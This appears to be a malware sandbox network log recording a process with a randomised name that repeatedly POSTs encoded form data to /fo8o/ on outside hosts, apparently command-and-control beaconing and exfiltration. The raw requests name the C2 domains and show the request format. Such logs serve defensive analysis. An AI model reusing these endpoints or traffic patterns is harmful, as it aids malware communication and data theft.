                                                    Jun 9, 2024 18:02:14.755141020 CEST1236INData Raw: 68 65 61 64 2e 6c 61 73 74 43 68 69 6c 64 29 2c 24 73 63 72 69 70 74 31 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b
                                                    Data Ascii: head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};bre
                                                    Jun 9, 2024 18:02:14.755176067 CEST117INData Raw: 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 61 67 65 2e 75 63 2e 63 6e 2f 73 2f 75 61 65 2f 67 2f 33 6f 2f 62 65 72 67 2f 73 74 61 74 69 63 2f 61 72 63 68 65 72 5f 69 6e 64 65 78 2e 65 39 36 64 63 36 64 63 36 38 36 33 38
                                                    Data Ascii: <script src="https://image.uc.cn/s/uae/g/3o/berg/static/archer_index.e96dc6dc6863835f4ad0.js"></script></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    37192.168.2.1149749217.196.55.202806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:02:19.842185020 CEST785OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.empowermedeco.com
                                                    Origin: http://www.empowermedeco.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.empowermedeco.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 76 39 31 72 6c 4f 32 6e 39 6f 4c 61 47 32 41 39 46 7a 47 48 47 79 56 53 31 58 6a 33 52 2b 57 52 6b 41 3d 3d
                                                    Data Ascii: Zl4h1=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Jv91rlO2n9oLaG2A9FzGHGyVS1Xj3R+WRkA==
                                                    Jun 9, 2024 18:02:20.479007006 CEST1070INHTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    content-type: text/html
                                                    content-length: 795
                                                    date: Sun, 09 Jun 2024 16:02:20 GMT
                                                    server: LiteSpeed
                                                    location: https://www.empowermedeco.com/fo8o/
                                                    platform: hostinger
                                                    content-security-policy: upgrade-insecure-requests
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    38192.168.2.1149750217.196.55.202806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:02:22.376936913 CEST805OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.empowermedeco.com
                                                    Origin: http://www.empowermedeco.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.empowermedeco.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 64 51 68 78 43 48 59 50 7a 59 2f 4a 32 6a 6d 44 44 53 6d 41 76 31 4b 2f 52 54 4a 57 65 6b 6a 6b 6f 3d
                                                    Data Ascii: Zl4h1=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhdQhxCHYPzY/J2jmDDSmAv1K/RTJWekjko=
                                                    Jun 9, 2024 18:02:23.022701025 CEST1070INHTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    content-type: text/html
                                                    content-length: 795
                                                    date: Sun, 09 Jun 2024 16:02:22 GMT
                                                    server: LiteSpeed
                                                    location: https://www.empowermedeco.com/fo8o/
                                                    platform: hostinger
                                                    content-security-policy: upgrade-insecure-requests
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    39192.168.2.1149751217.196.55.202806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:02:24.913691044 CEST1818OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.empowermedeco.com
                                                    Origin: http://www.empowermedeco.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.empowermedeco.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 79 66 57 62 33 4e 6e 38 58 44 6c 46 66 7a 61 2f 49 66 64 6e 42 33 6d 7a 51 37 57 4b 65 6f 72 65 55 75 34 78 30 73 63 6b 71 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 31 4f 5a 6e 37 68 75 35 4b 34 66 33 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 [TRUNCATED]
                                                    Data Ascii: Zl4h1=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJyfWb3Nn8XDlFfza/IfdnB3mzQ7WKeoreUu4x0sckqATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO1OZn7hu5K4f3/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803eV87ixRjkXYPl2e5FDOjxQX427zjUnUZjVjptuwgpmwelJA19UL29C3XJf4vPIK6ATY0nVxKPNo2ZwjLiViXzLp1YW7PSxYZU4ZA0Zr6PICBxqpQaYANQ2s2AzdyARGRFQe8cDa88hWKqJV2mMu8MmqUZpNHSSTPUB8ZW2tVpuzKjUAT+L/DYRlFEmMUr+LP5MxsmVh+kX2xBtSlChMIZMdrfC99MlSTpVkPCUJSM9DzozNJM/M111cAOyk7jpxg9w4vHBzY+3Dk6Iqjgoqhuy44hY940VKm1RSJhAbTNeY+Vdagik4IZKQ6/MSF4ftBmCamuYJijIhieIQaEVBiYpDJpEcBd4GcSFZFuVSofKZvMQJYLm91NAQsJ3/xf2B+nsFLywh2VUWnKR13rJWfje2VxH140ip8z0/xLddlXm4P8x5U1kALHoosi/t4LCnl0CQ/pNRJuBs785Rpk7UF53/buWJOJoeonn8HkJlH/B48jP+pwRZl9f9CECTs/NnXQpw9SPqexrnbf8T7d6vtuZoPXkkIlqPtqVy33vyhj/v5IYVmjdOF1+gpADjP7RqKUxcpUVhjfH2bNp0IMM3LDFqmcraCI2d2LB5OUsFB3nsdBlY6kFbDO6ryJaPSOSERN29h71noTGKCM3h0zsmEzuVfmxZAL2Y09L5 [TRUNCATED]
                                                    Jun 9, 2024 18:02:25.558496952 CEST1070INHTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    content-type: text/html
                                                    content-length: 795
                                                    date: Sun, 09 Jun 2024 16:02:25 GMT
                                                    server: LiteSpeed
                                                    location: https://www.empowermedeco.com/fo8o/
                                                    platform: hostinger
                                                    content-security-policy: upgrade-insecure-requests
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    40192.168.2.1149752217.196.55.202806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:02:27.441648006 CEST509OUTGET /fo8o/?Zl4h1=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.empowermedeco.com
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:02:28.083786011 CEST1211INHTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    content-type: text/html
                                                    content-length: 795
                                                    date: Sun, 09 Jun 2024 16:02:28 GMT
                                                    server: LiteSpeed
                                                    location: https://www.empowermedeco.com/fo8o/?Zl4h1=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgd1+5vEXfQMT7HDcUO7Jh3BJK53kSorIMs=&Pbw=PLVXbnG85
                                                    platform: hostinger
                                                    content-security-policy: upgrade-insecure-requests
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    41192.168.2.1149753104.206.198.212806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:02:49.584657907 CEST779OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.shenzhoucui.com
                                                    Origin: http://www.shenzhoucui.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.shenzhoucui.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 50 49 6e 49 63 4d 6d 76 50 55 67 68 68 69 71 34 65 61 6e 35 72 38 69 50 4f 69 59 69 56 6a 57 66 48 35 65 4a 33 34 41 58 45 59 46 38 6b 77 6f 54 79 2f 46 79 36 4f 61 57 49 75 4f 34 37 53 69 35 51 52 76 4b 74 55 7a 49 73 37 78 39 72 4d 52 4b 61 52 64 46 54 45 45 4d 50 58 31 51 43 51 64 4e 6e 39 69 2b 64 65 30 6c 44 74 45 4d 42 64 54 2b 39 65 56 71 4d 61 4b 71 35 47 72 43 6a 6d 63 43 39 61 4d 68 68 35 6b 56 70 79 4d 52 33 36 4f 61 66 52 54 56 79 53 6d 63 2f 49 74 36 70 6e 78 51 35 7a 62 44 6b 4a 45 69 6f 64 63 4c 72 35 7a 73 79 4d 4d 63 6f 49 4b 32 4d 5a 44 63 36 64 63 53 6f 77 3d 3d
                                                    Data Ascii: Zl4h1=PInIcMmvPUghhiq4ean5r8iPOiYiVjWfH5eJ34AXEYF8kwoTy/Fy6OaWIuO47Si5QRvKtUzIs7x9rMRKaRdFTEEMPX1QCQdNn9i+de0lDtEMBdT+9eVqMaKq5GrCjmcC9aMhh5kVpyMR36OafRTVySmc/It6pnxQ5zbDkJEiodcLr5zsyMMcoIK2MZDc6dcSow==
                                                    Jun 9, 2024 18:02:50.331880093 CEST1037INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sun, 09 Jun 2024 16:02:51 GMT
                                                    Content-Type: text/html;charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Vary: Accept-Encoding
                                                    X-Powered-By: PHP/5.4.41
                                                    Content-Encoding: gzip
                                                    Data Raw: 33 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 4d 6f dc 36 10 bd fb 57 4c 74 d9 5d a0 2b 6a 5d 27 4e b4 5a 1d 1c 3b 48 00 d7 35 e2 0d 90 a0 28 0a 8a 9a 5d d1 91 48 86 a4 d6 5e 27 01 72 29 72 e8 a1 e8 a1 01 82 a4 a7 a2 40 8f 69 4f 05 0a f7 d7 74 dd f6 5f 74 24 6d d1 4d 3f 0e a2 44 72 de e3 cc e3 1b 25 d7 f6 3f be 3d 7d 74 7c 00 77 a7 1f 1d c2 f1 83 bd c3 7b b7 21 18 32 76 ef 60 7a 87 b1 fd e9 7e b7 b3 1d 46 8c 1d 1c 05 e9 56 52 f8 aa 6c 5e c8 f3 34 f1 d2 97 98 fe f1 f2 ab ab 1f 5f af be ff 81 1b f3 eb 4f 5f fc 7e 79 79 eb fa 6e 34 bc 7a fb e2 ea d5 bb d5 db 77 ab 6f 5e 3c fb ed f5 cf ab cb af 57 9f 7f b7 fa f2 db 84 75 b8 ad c4 09 2b 8d 07 67 c5 24 60 a7 4f 6a b4 cb b0 92 2a 3c 75 01 a4 09 eb b6 e9 a3 3d 6d 2b c9 74 be 84 6c 2e 74 a9 ed 24 38 2b a4 c7 36 a5 51 ba 13 7d 08 77 b4 cd 64 9e a3 a2 f8 11 2d 9b f4 91 ae 21 d7 aa e7 a1 e0 0b 04 83 b6 92 ce 49 ad c0 6b e0 42 a0 73 e0 0b 84 07 f7 0f a1 59 2c a4 03 87 76 81 36 84 13 6d ed 12 66 da b6 11 52 09 ad 16 a8 24 2a 81 61 92 59 96 6e 1d 97 c8 1d 82 [TRUNCATED]
                                                    Data Ascii: 31buTMo6WLt]+j]'NZ;H5(]H^'r)r@iOt_t$mM?Dr%?=}t|w{!2v`z~FVRl^4_O_~yyn4zwo^<Wu+g$`Oj*<u=m+tl.t$8+6Q}wd-!IkBsY,v6mfR$*aYnE19Wy)[L>jNDYqNvkicXRtZf3IFLl=g]:d#XU0;h{8ZyTyJKs\aBt#nc8,q<'9QdrbWi8#{EkQP*<<e%03|c*n6HF%kJ4<]pLAHQc&5CHnqoIXp2^q<LHClREM6*R*]A??m/33.6%x+;hp89RQ{=~f>7Ano_0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    42192.168.2.1149754104.206.198.212806576C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jun 9, 2024 18:02:52.114195108 CEST799OUTPOST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.shenzhoucui.com
                                                    Origin: http://www.shenzhoucui.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.shenzhoucui.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
